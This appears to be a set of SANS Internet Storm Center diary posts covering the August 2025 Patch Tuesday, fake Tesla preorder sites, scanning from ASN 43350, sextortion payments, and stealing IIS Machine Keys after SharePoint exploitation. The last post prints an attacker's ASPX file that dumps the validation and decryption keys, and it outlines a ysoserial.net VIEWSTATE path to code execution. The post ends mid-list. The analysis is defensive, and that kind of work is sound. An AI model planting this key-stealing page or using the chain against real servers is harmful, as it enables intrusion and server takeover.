Microsoft August 2025 Patch Tuesday
This month's Microsoft patch update addresses a total of 111 vulnerabilities, with 17 classified as critical. Among these, one vulnerability was disclosed prior to the patch release, marking it as a zero-day. While none of the vulnerabilities have been exploited in the wild, the critical ones pose significant risks, including remote code execution and elevation of privilege. Users are strongly advised to apply the updates promptly to safeguard their systems against potential threats.
Windows Kerberos Elevation of Privilege Vulnerability (CVE-2025-53779) is a disclosed zero-day vulnerability with a CVSS score of 7.2, rated as Moderate in severity. Although it has not been exploited in the wild, it poses a significant risk as it allows an attacker to gain domain administrator privileges. To exploit this vulnerability, an attacker would need high privileges, specifically access to certain attributes of the dMSA, such as msds-groupMSAMembership and msds-ManagedAccountPrecededByLink. These attributes enable the attacker to utilize the dMSA and specify a user that the dMSA can act on behalf of, potentially compromising the security of the domain.
Windows Graphics Component Remote Code Execution Vulnerability (CVE-2025-50165) is a critical vulnerability with a CVSS score of 9.8, which has not been exploited in the wild nor disclosed publicly as a zero-day. This vulnerability allows for remote code execution, posing a significant threat due to its ability to be exploited without any user interaction. The attack vector is network-based, and the vulnerability arises from an uninitialized function pointer being called when decoding a JPEG image, which can be embedded in Office and third-party documents or files. Successful exploitation could enable an attacker to execute arbitrary code remotely, highlighting the critical need for immediate attention and remediation to prevent potential exploitation.
GDI+ Remote Code Execution Vulnerability (CVE-2025-53766) is a critical vulnerability with a CVSS score of 9.8, which has not been exploited in the wild nor disclosed publicly as a zero-day. This vulnerability allows for remote code execution on web services parsing documents with specially crafted metafiles, without requiring any user interaction or privileges from the attacker. The attack vector is network-based, meaning an attacker could exploit this vulnerability by uploading such documents to web services, potentially leading to significant security breaches. The Preview Pane is not considered an attack vector for this vulnerability, and mitigation strategies should focus on securing web services against unauthorized document uploads.
Azure Portal Elevation of Privilege Vulnerability (CVE-2025-53792) is a critical vulnerability with a CVSS score of 9.1, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability allows for elevation of privilege, potentially enabling unauthorized access to sensitive resources within the Azure Portal. Despite its critical severity, Microsoft has already fully mitigated this vulnerability, and no further action is required from users of the service. The CVE was issued to provide transparency regarding the vulnerability and its resolution, aligning with Microsoft's commitment to greater transparency in cloud service security.
Windows NTLM Elevation of Privilege Vulnerability (CVE-2025-53778) is a critical vulnerability, identified as CVE-2025-53778, has not been exploited in the wild nor disclosed publicly as a zero-day. It carries a CVSS score of 8.8, indicating its high severity. The vulnerability allows an attacker to elevate their privileges to SYSTEM level, posing a significant risk to affected systems. Although currently not exploited, organizations are advised to implement mitigation strategies to prevent potential exploitation and ensure the security of their systems.
Microsoft Office Remote Code Execution Vulnerability (CVE-2025-53731) is a critical vulnerability with a CVSS score of 8.4, which has neither been exploited in the wild nor disclosed as a zero-day. This vulnerability allows for remote code execution, meaning an attacker can execute arbitrary code on the affected system, although the attack must be initiated locally. The Preview Pane in Microsoft Office serves as an attack vector, enabling the execution of malicious code when a user previews a compromised document. Despite the remote nature of the attacker's location, the exploit requires local execution, posing significant security risks if not addressed. Users are advised to apply necessary patches and updates to mitigate potential threats.
Microsoft Word Remote Code Execution Vulnerability (CVE-2025-53733) is a critical vulnerability with a CVSS score of 8.4, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability allows for remote code execution, although the attack vector is local, meaning the attacker or victim must execute code from the local machine. The Preview Pane in Microsoft Word serves as an attack vector for this vulnerability, potentially enabling arbitrary code execution. Users are advised to apply all relevant updates for their software to mitigate this risk, as multiple update packages may be necessary to fully address the vulnerability.
Microsoft Office Remote Code Execution Vulnerability (CVE-2025-53740) is a critical vulnerability that has not been exploited in the wild nor disclosed publicly, making it a potential zero-day threat. With a CVSS score of 8.4, this vulnerability allows for remote code execution, posing a significant risk to systems running Microsoft Office. Despite the attack vector being local, the term "Remote" refers to the attacker's location, indicating that the exploit can be initiated by executing code on the local machine. The Preview Pane in Microsoft Office is identified as a potential attack vector, which could be leveraged by attackers to execute arbitrary code. Users are advised to remain vigilant and apply necessary security measures to mitigate potential risks associated with this vulnerability.
Microsoft Word Remote Code Execution Vulnerability (CVE-2025-53784) is a critical vulnerability with a CVSS score of 8.4, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability allows for remote code execution, meaning an attacker can execute arbitrary code on the affected system, although the attack must be initiated locally. The vulnerability is particularly concerning because it can be exploited through the Preview Pane, making it a potential vector for attacks. Despite its critical nature, no active exploitation has been reported, and mitigation strategies should focus on securing local execution environments and monitoring for suspicious activity.
Microsoft 365 Copilot BizChat Information Disclosure Vulnerability (CVE-2025-53787) is a critical vulnerability with a CVSS score of 8.2, which has not been exploited in the wild nor disclosed publicly, thus not qualifying as a zero-day. This vulnerability could potentially lead to information disclosure, compromising sensitive data within the Microsoft 365 Copilot BizChat service. Despite its severity, Microsoft has already fully mitigated the issue, and there are no further actions required from users. The CVE was published to enhance transparency regarding cloud service vulnerabilities, ensuring users are informed about past security issues and their resolutions.
This summary of Microsoft's monthly updates highlights critical vulnerabilities, emphasizing the need for immediate attention to certain threats. Notably, the Windows Graphics Component Remote Code Execution Vulnerability (CVE-2025-50165) and GDI+ Remote Code Execution Vulnerability (CVE-2025-53766) both pose significant risks due to their potential for remote exploitation without user interaction. Users should prioritize patching these vulnerabilities to prevent unauthorized code execution. Additionally, the Windows Kerberos Elevation of Privilege Vulnerability (CVE-2025-53779), a disclosed zero-day, requires high privileges to exploit but could lead to domain administrator access, necessitating careful monitoring and mitigation. While some vulnerabilities, like the Azure Portal Elevation of Privilege, have been fully mitigated by Microsoft, others demand user action to ensure system security.
| Description | |||||||
|---|---|---|---|---|---|---|---|
| CVE | Disclosed | Exploited | Exploitability (old versions) | current version | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
| Azure OpenAI Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53767%% | No | No | - | - | Critical | 10.0 | 8.7 |
| Azure Portal Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53792%% | No | No | - | - | Critical | 9.1 | 7.9 |
| Azure Stack Hub Information Disclosure Vulnerability | |||||||
| %%cve:2025-53765%% | No | No | - | - | Important | 4.4 | 3.9 |
| %%cve:2025-53793%% | No | No | - | - | Critical | 7.5 | 6.5 |
| Azure Virtual Machines Information Disclosure Vulnerability | |||||||
| %%cve:2025-53781%% | No | No | - | - | Critical | 7.7 | 6.7 |
| Azure Virtual Machines Spoofing Vulnerability | |||||||
| %%cve:2025-49707%% | No | No | - | - | Critical | 7.9 | 6.9 |
| Desktop Windows Manager Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-50153%% | No | No | - | - | Important | 7.8 | 6.8 |
| Desktop Windows Manager Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53152%% | No | No | - | - | Important | 7.8 | 6.8 |
| DirectX Graphics Kernel Denial of Service Vulnerability | |||||||
| %%cve:2025-50172%% | No | No | - | - | Important | 6.5 | 5.7 |
| DirectX Graphics Kernel Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53135%% | No | No | - | - | Important | 7.0 | 6.1 |
| DirectX Graphics Kernel Remote Code Execution Vulnerability | |||||||
| %%cve:2025-50176%% | No | No | - | - | Critical | 7.8 | 6.8 |
| GDI+ Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53766%% | No | No | - | - | Critical | 9.8 | 8.5 |
| GitHub Copilot and Visual Studio Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53773%% | No | No | - | - | Important | 7.8 | 6.8 |
| Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53149%% | No | No | - | - | Important | 7.8 | 6.8 |
| Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability | |||||||
| %%cve:2025-53716%% | No | No | - | - | Important | 6.5 | 5.7 |
| Microsoft 365 Copilot BizChat Information Disclosure Vulnerability | |||||||
| %%cve:2025-53774%% | No | No | - | - | Critical | 6.5 | 5.7 |
| %%cve:2025-53787%% | No | No | - | - | Critical | 8.2 | 7.1 |
| Microsoft Azure File Sync Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53729%% | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft Brokering File System Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53142%% | No | No | - | - | Important | 7.0 | 6.1 |
| Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability | |||||||
| %%cve:2025-53728%% | No | No | - | - | Important | 6.5 | 5.7 |
| Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | |||||||
| %%cve:2025-49745%% | No | No | - | - | Important | 5.4 | 4.7 |
| Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability | |||||||
| %%cve:2025-49755%% | No | No | - | - | Low | 4.3 | 3.8 |
| %%cve:2025-49736%% | No | No | - | - | Moderate | 4.3 | 3.8 |
| Microsoft Excel Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53741%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53759%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53735%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53737%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53739%% | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53786%% | No | No | - | - | Important | 8.0 | 7.0 |
| Microsoft Exchange Server Information Disclosure Vulnerability | |||||||
| %%cve:2025-33051%% | No | No | - | - | Important | 7.5 | 6.5 |
| Microsoft Exchange Server Spoofing Vulnerability | |||||||
| %%cve:2025-25006%% | No | No | - | - | Important | 5.3 | 4.6 |
| %%cve:2025-25007%% | No | No | - | - | Important | 5.3 | 4.6 |
| Microsoft Exchange Server Tampering Vulnerability | |||||||
| %%cve:2025-25005%% | No | No | - | - | Important | 6.5 | 5.7 |
| Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | |||||||
| %%cve:2025-50177%% | No | No | - | - | Critical | 8.1 | 7.1 |
| %%cve:2025-53143%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-53144%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-53145%% | No | No | - | - | Important | 8.8 | 7.7 |
| Microsoft Office Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53731%% | No | No | - | - | Critical | 8.4 | 7.3 |
| %%cve:2025-53732%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53740%% | No | No | - | - | Critical | 8.4 | 7.3 |
| Microsoft Office Visio Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53730%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53734%% | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft PowerPoint Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53761%% | No | No | - | - | Important | 7.8 | 6.8 |
| Microsoft SQL Server Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-49758%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-53727%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-24999%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-49759%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-47954%% | No | No | - | - | Important | 8.8 | 7.7 |
| Microsoft SharePoint Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53760%% | No | No | - | - | Important | 7.1 | 6.2 |
| Microsoft SharePoint Remote Code Execution Vulnerability | |||||||
| %%cve:2025-49712%% | No | No | - | - | Important | 8.8 | 7.7 |
| Microsoft Teams Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53783%% | No | No | - | - | Important | 7.5 | 6.5 |
| Microsoft Windows File Explorer Spoofing Vulnerability | |||||||
| %%cve:2025-50154%% | No | No | - | - | Important | 7.5 | 6.5 |
| Microsoft Word Information Disclosure Vulnerability | |||||||
| %%cve:2025-53736%% | No | No | - | - | Important | 6.8 | 5.9 |
| Microsoft Word Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53733%% | No | No | - | - | Critical | 8.4 | 7.3 |
| %%cve:2025-53738%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53784%% | No | No | - | - | Critical | 8.4 | 7.3 |
| NT OS Kernel Information Disclosure Vulnerability | |||||||
| %%cve:2025-53136%% | No | No | - | - | Important | 5.5 | 4.8 |
| Remote Access Point-to-Point Protocol (PPP) EAP-TLS Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-50159%% | No | No | - | - | Important | 7.3 | 6.4 |
| Remote Desktop Spoofing Vulnerability | |||||||
| %%cve:2025-50171%% | No | No | - | - | Important | 9.1 | 7.9 |
| Web Deploy Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53772%% | No | No | - | - | Important | 8.8 | 7.7 |
| Win32k Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-50161%% | No | No | - | - | Important | 7.3 | 6.4 |
| %%cve:2025-50168%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53132%% | No | No | - | - | Important | 8.0 | 7.0 |
| Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-49762%% | No | No | - | - | Important | 7.0 | 6.1 |
| %%cve:2025-53134%% | No | No | - | - | Important | 7.0 | 6.1 |
| %%cve:2025-53137%% | No | No | - | - | Important | 7.0 | 6.1 |
| %%cve:2025-53141%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53147%% | No | No | - | - | Important | 7.0 | 6.1 |
| %%cve:2025-53154%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53718%% | No | No | - | - | Important | 7.0 | 6.1 |
| Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-50170%% | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Connected Devices Platform Service Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53721%% | No | No | - | - | Important | 7.0 | 6.1 |
| Windows Distributed Transaction Coordinator (MSDTC) Information Disclosure Vulnerability | |||||||
| %%cve:2025-50166%% | No | No | - | - | Important | 6.5 | 5.7 |
| Windows Graphics Component Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-49743%% | No | No | - | - | Important | 6.7 | 5.8 |
| Windows Graphics Component Remote Code Execution Vulnerability | |||||||
| %%cve:2025-50165%% | No | No | - | - | Critical | 9.8 | 8.5 |
| Windows Hyper-V Denial of Service Vulnerability | |||||||
| %%cve:2025-49751%% | No | No | - | - | Important | 6.8 | 5.9 |
| Windows Hyper-V Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-50167%% | No | No | - | - | Important | 7.0 | 6.1 |
| %%cve:2025-53155%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53723%% | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Hyper-V Remote Code Execution Vulnerability | |||||||
| %%cve:2025-48807%% | No | No | - | - | Critical | 7.5 | 6.5 |
| Windows Installer Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-50173%% | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Kerberos Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53779%% | Yes | No | - | - | Moderate | 7.2 | 6.7 |
| Windows Kernel Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-49761%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53151%% | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Kernel Transaction Manager Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53140%% | No | No | - | - | Important | 7.0 | 6.1 |
| Windows Media Remote Code Execution Vulnerability | |||||||
| %%cve:2025-53131%% | No | No | - | - | Important | 8.8 | 7.7 |
| Windows NTFS Information Disclosure Vulnerability | |||||||
| %%cve:2025-50158%% | No | No | - | - | Important | 7.0 | 6.3 |
| Windows NTLM Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53778%% | No | No | - | - | Critical | 8.8 | 7.7 |
| Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53133%% | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Push Notifications Apps Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53724%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53725%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-53726%% | No | No | - | - | Important | 7.8 | 6.8 |
| %%cve:2025-50155%% | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Remote Desktop ServicesDenial of Service Vulnerability | |||||||
| %%cve:2025-53722%% | No | No | - | - | Important | 7.5 | 6.5 |
| Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability | |||||||
| %%cve:2025-50156%% | No | No | - | - | Important | 5.7 | 5.0 |
| %%cve:2025-53138%% | No | No | - | - | Important | 5.7 | 5.0 |
| %%cve:2025-53148%% | No | No | - | - | Important | 5.7 | 5.0 |
| %%cve:2025-53153%% | No | No | - | - | Important | 5.7 | 5.0 |
| %%cve:2025-53719%% | No | No | - | - | Important | 5.7 | 5.0 |
| %%cve:2025-50157%% | No | No | - | - | Important | 5.7 | 5.0 |
| Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | |||||||
| %%cve:2025-49757%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-50160%% | No | No | - | - | Important | 8.0 | 7.0 |
| %%cve:2025-50162%% | No | No | - | - | Important | 8.0 | 7.0 |
| %%cve:2025-50163%% | No | No | - | - | Important | 8.8 | 7.7 |
| %%cve:2025-50164%% | No | No | - | - | Important | 8.0 | 7.0 |
| %%cve:2025-53720%% | No | No | - | - | Important | 8.0 | 7.0 |
| Windows SMB Remote Code Execution Vulnerability | |||||||
| %%cve:2025-50169%% | No | No | - | - | Important | 7.5 | 6.5 |
| Windows Security App Spoofing Vulnerability | |||||||
| %%cve:2025-53769%% | No | No | - | - | Important | 5.5 | 4.8 |
| Windows StateRepository API Server file Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53789%% | No | No | - | - | Important | 7.8 | 6.8 |
| Windows Storage Port Driver Information Disclosure Vulnerability | |||||||
| %%cve:2025-53156%% | No | No | - | - | Important | 5.5 | 4.8 |
| Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability | |||||||
| %%cve:2025-53788%% | No | No | - | - | Important | 7.0 | 6.1 |
Google Paid Ads for Fake Tesla Websites
In recent media events, Tesla has demoed progressively more sophisticated versions of its Optimus robots. The sales pitch is pretty simple: "Current AI" is fun, but what we really need is not something to create more funny kitten pictures. We need AI to load and empty dishwashers, fold laundry, and mow lawns. But the robot has not been for sale yet, and there is no firm release date.
In the past, Tesla has accepted preorders for future products, asking for a deposit, which in some cases was even refundable. But aside from an April Fool's posting announcing such a presale, as far as I can tell, no presale has been offered by Tesla.
However, if you search for "Optimus Tesla preorder" and other similar terms, sites claiming to offer Optimus preorders will be advertised.
These are sponsored listings. The official Tesla site (without the preorder option) shows below these fake links.
We have often seen sponsored listings like this used to advertise malware. But in this case, I suspect, the goal is simply to steal money from people willing to pay for preorders. The interesting twist is that the theft may remain unnoticed until the customer expects delivery, which may be months or years from now.
So far, I have seen these ads lead to three different websites:
- offers-tesla.com (currently active)
- exclusive-tesla.com (now offline)
- prelaunch-tesla.com (now offline)
Other suspect domains:
- private-tesla.com (unreachable)
- corp-tesla.com (redirects to legitimate tesla.com site)
- www-tesla.com (unreachable)
- hyper-tesla.com (unreachable)
- auth.cp-tesla.com (used for account setup by fake site)
The sites display a complete copy of a slightly older design of the Tesla.com website. As far as I can tell, the design does not include a login page. Standard phishing does not appear to be the goal here. Not having a login page may make it easier to hide that no orders are being placed. Customers will not be able to use the fake site to check their order status.
It asks for a $250 non-refundable deposit, which aligns with what Tesla asked for in prior preorder events.
I tried to place an order with a test credit card number, and it was accepted, showing that the credit card was not charged (yet?). Next, I was directed to auth.cp-tesla.com to set up an account. I never received the e-mail confirmation, so I am not sure if my spam filters dropped it or if it is supposed to fail. The original Tesla site uses "auth.tesla.com" for authentication.
Setting up credit card processing for a fake site is likely too complicated, and I assume the site just collects the payment card data to later use the cards on other sites for fraudulent orders or just to resell the payment card data (are there still "Carder" forums? Have not looked at that in a while). So far, the fake sites have only been available for a few days before being shut down. I assume that Tesla monitors these sites and sends takedown requests as they find them.
Preorders are accepted not only for Optimus robots but also for other Tesla products. Interestingly, the data is sent to different sites, not just to the original site. One URL used is https://caribview.info/tesla/. There are a few open directory listings on offers-tesla.com (for example,/api and /js). File dates are from March and May 2025, which is likely around the time the Tesla site was copied. The fake site is hosted behind Cloudflare.
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Social Media Links: https://jbu.me
0 Comments
Mass Internet Scanning from ASN 43350 [Guest Diary]
[This is a Guest Diary by Duncan Woosley, an ISC intern as part of the SANS.edu BACS program]
During the last three months I've had a DShield sensor online and collecting data from a deployment in AWS. This week I did some statistical analysis of the last three months of data and found surprising result. Of all the locations that scanned and attacked the DShield sensor, one location was a clear winner in terms of volume of traffic, accounting for over 65% of the total traffic sent to the sensor. To my surprise, that location was Panama!
Total DShield Sensor Traffic per Location
The top 10 locations were close to inline with common expectations, however, the traffic from Panama was greater than the total traffic from all the remaining locations combined!
Digging into the source of this anomaly, I filtered for traffic by day and found that there were massive spikes on just a few days in the last three months that accounted for most of the DShield sensor's captured volume.
Largest Single Days by volume from April 7th to July 7th
Each spike was found to be caused by traffic from a single IP each day, but the IP responsible for each spike was different. However, six of the top ten most active IPs were all from a single /24 subnet! The subnet 141.98.80.0/24 was the cause of 59.4% of total logs collected by the sensor. Moreover, nine of the top 10 IPs were from the same internet service provider (ISP) named "NForce Entertainment B.V."
Autonomous System Numbers (ASN) 43350 accounted for 71.6% of the total sensor logs! This ASN belonging to NForce Entertainment but NForce Entertainment appears to often lease out its IP space to other VPN and proxy providers like the Panama based Flyservers S.A. Flyservers is categorized as a "potentially very high fraud risk ISP" by Scamalytics and is likely the source of this activity.
Top ASNs by Total Traffic
Further research into this ISP found that the NForce Entertainment IP activity was often associated with phishing, malware, and scanning. As a Dutch ISP, they operate without strict regulatory oversight or pressure from their host nation to revoke threat actors’ use of their services.
Recommendations
Unfortunately, the solution for network defenders isn't as simple as blocking all traffic from NForce Entertainment. If your organization is in a position where no NForce Entertainment traffic is required for business, this may be an option, but the majority of organizations don’t allow sweeping IP blocking. Instead, I would recommend blocking only sensitive services and HTTP(S) endpoints that allow for logins. The following actions are recommended.
• Flagging traffic from NForce Entertainment and particularly from ASN 43350.
• Block access to Remote Desktop Protocol from the internet.
• Monitor for SSH activity from ASN 43350 and configured SSH to use key based authentication.
• Implement a Web Application Firewall (WAF) for all web applications and monitor activity originating from any sources for suspicious queries.
• Create a WAF alert threshold for high traffic originating from a single source.
[1] https://www.arin.net/resources/guide/asn/
[2] https://scamalytics.com
[3] https://owasp.org/www-community/Web_Application_Firewall
[4] https://www.sans.edu/cyber-security-programs/bachelors-degree/
NOTE: ChatGTP was used for Spelling and grammar checks only
-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
2 Comments
Do sextortion scams still work in 2025?
Sextortion e-mails have been with us for quite a while, and these days, most security professionals tend to think of them more in terms of an “e-mail background noise” rather than as if they posed any serious threat. Given that their existence is reasonably well-known even among general public, this viewpoint would seem to be justified… But are sextortion messages really irrelevant as a threat at this point, and can we therefore safely omit this topic during security awareness trainings?
I thought that it might be worthwhile to try and find out, so I decided to go over sextortion messages that were delivered to my various spam traps and e-mail accounts during the past 12 months and see whether the cryptocurrency addresses mentioned in them actually received any payments.
In total, I collected 21 different e-mail messages that asked for payment to be sent to 15 distinct cryptocurrency addresses (13 of these were Bitcoin addresses and 2 were Litecoin addresses). For completeness’s sake, it should be noted that while most of the addresses were only seen in e-mails delivered during a single day, this wasn’t always the case, as one of the addresses was observed in messages sent out 32 days apart.
Admittedly, 15 addresses represent a rather small sample size, but it proved to be more than sufficient to give us the desired information about the continued effectiveness of sextortion…
In the sextortion messages, their senders were asking for payments of between $750 and $1,550, with average and median requested amounts being $1,203 and $1,250, respectively. While 6 of the 15 identified addresses didn’t receive any payments at all, the remaining 9 did – in total, incoming transactions to these addresses amounted to between $945 and $10,715, with average and median total amounts received being $1,836 and $1,028, respectively.
Although not all incoming payments to the addresses were necessarily connected solely to sextortion, it seems highly probable that at least most of them were… Which suggests that even in 2025, sextortion is still a relevant threat, and a topic that warrants attention in security awareness programs.
-----------
Jan Kopriva
LinkedIn
Nettles Consulting
0 Comments
Stealing Machine Keys for fun and profit (or riding the SharePoint wave)
About 10 days ago exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused – we wrote about that at here and here .
The original SharePoint vulnerability is a deserialization vulnerability that allowed an attacker to execute arbitrary commands – while these could be literally anything, majority of exploits that we analyzed resulted in attackers dropping an ASPX file that just revealed the IIS Machine Key to them. This prompted me into diving a bit deeper into how this can be abused.
What are IIS Machine Keys?
A Machine Key in IIS and ASP.NET is a configuration setting used to ensure the security and integrity of data exchanged between the server and clients.
Basically, it is responsible for validating and encrypting sensitive data such as VIEWSTATE, cookies, and session state, protecting them from tampering or unauthorized access. An IIS administrator can define specific Machine Key settings – there are many possible ways to configure all of this, but for this diary we will look into VIEWSTATE protection.
VIEWSTATE is a mechanism used in ASP.NET Web Forms to persist the state of controls and page data between postbacks (i.e., between user actions that send the page back to the server). It allows a developer to easily store values of various controls after a form has been submitted. VIEWSTATE is always used by an IIS APS.NET application.
Since VIEWSTATE can hold sensitive information, it should be appropriately protected. And this is where Machine Keys come into the game – they are used by IIS to prevent tampering of VIEWSTATE and (optionally) encrypt its contents.
By default, IIS (even the very latest version on Windows server 2025) will enable VIEWSTATE MAC (Message Authentication Code) validation but will leave encryption on “Auto” which means that it is not used, as shown in the figure below:
This is not too big of a problem, unless a developer decides to store something confidential in VIEWSTATE.
Machine Key, as you can probably guess by now, is used to perform validation – again, by default SHA1 is used. Several other algorithms are supported, with HMACSHA256 being the second most commonly used one.
Machine Key handling
Since Machine Key is used to validate VIEWSTATE integrity, it is obviously a very important security element. If an attacker gets Machine Key of a server, they can modify VIEWSTATE (and cookies) to arbitrary values and calculate proper MAC which could allow them to perform all sorts of abuse – even achieve remote code execution, as we will demonstrate later.
So, how does one handle this? The whole setup can get a bit complex depending under which account IIS is running, but in most common setups, one of the following two approaches is used:
- Machine Key is automatically generated by IIS. This is the default setup (one you can see in the image above) and in this case Machine Key is stored in Registry.
- Machine Key is generated by an administrator and stored in the web.config file. This is actually mandatory if you have a farm of servers behind a load balancer that need to be able to share sessions so such a setup is quite common!
Stealing a Machine Key
An attacker’s ultimate prize is to steal a Machine Key used by the target IIS server. So, how can they achieve that?
If the Machine Key is stored in a web.config file, in majority of cases it will be stored there in plain text! While it’s possible to encrypt the config section, this is very rarely done. In other words, an attacker that can fetch the web.config file can basically pwn the whole server!
This can be done, for example, through LFI (Local File Inclusion) or XXE (XML External Entities) vulnerabilities that allow the attacker to fetch contents of files.
If the Machine Key is automatically generated, it is stored in Registry, which means that the attacker needs code execution on the server to fetch this, but one important thing should be stressed here: there is nothing that can be done to prevent them from reading the Machine Key, provided they get code execution, even through ASPX files!
Back to our SharePoint story – once the original attackers exploited a vulnerable SharePoint server, they uploaded the following ASPX file:
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>
What does this script do? It will try to read the web.config file and will display both validation and encryption keys, together with used mode. If a Machine Key was stored in web.config, it would be leaked to an attacker, as shown in the image below:
With Machine Key available, the attacker can now achieve RCE on the affected server, due to way deserialization of VIEWSTATE works (and this is a feature!) – more about that further below, but let’s see the other case, when Machine Key is automatically generated and not stored in web.config:
Oh! No luck for the attacker, this script was not able to fetch Machine Key. Phew, all good, we do not have to do anything … or do we? Remember that I wrote above that automatically generated Machine Keys are stored in Registry. Is there anything preventing the attacker to drop a bit better APSX file that can read Registry?
Unfortunately NOT, as Soroush Dalili wrote in their fantastic blog here - one can simply read the key, no matter where it is stored. Soroush published a small ASPX file that goes through all potential locations of a Machine Key.
Clearly SharePoint attackers either did not care about other locations (and were happy with web.config ones), or did not know about this, but if you use Soroush’s script, you can fetch Machine Key even when it’s automatically generated, as shown for the same application I am using as proof of concept below:
Bottom line here is the following: if anyone gets any code execution on an IIS server, you absolutely need to regenerate the server’s Machine Key. Windows will not do this automatically for you, and this key persists through reboots!
Remote Code Execution
So what can one do with Machine Key now?
While we can modify values in VIEWSTATE (it is a bit difficult to read it as it’s serialized, but not impossible, of course), one can also use Alvaro Munoz’s fantastic ysoserial.net, which has builtin support for generating VIEWSTATE objects.
Now that we have a valid Machine Key, ysoserial.net allows us to create an object which, upon deserialization on the server side, will execute code. Since MAC will be valid (and even encrypted, if needed), IIS will happily try to deserialize it with the LosFormatter class which will ultimately allow for Remote Code Execution through deserialization as there are known gadgets that can be used here.
There are two key points here:
- There is nothing an administrator can do to prevent this if an attacker has a valid Machine Key
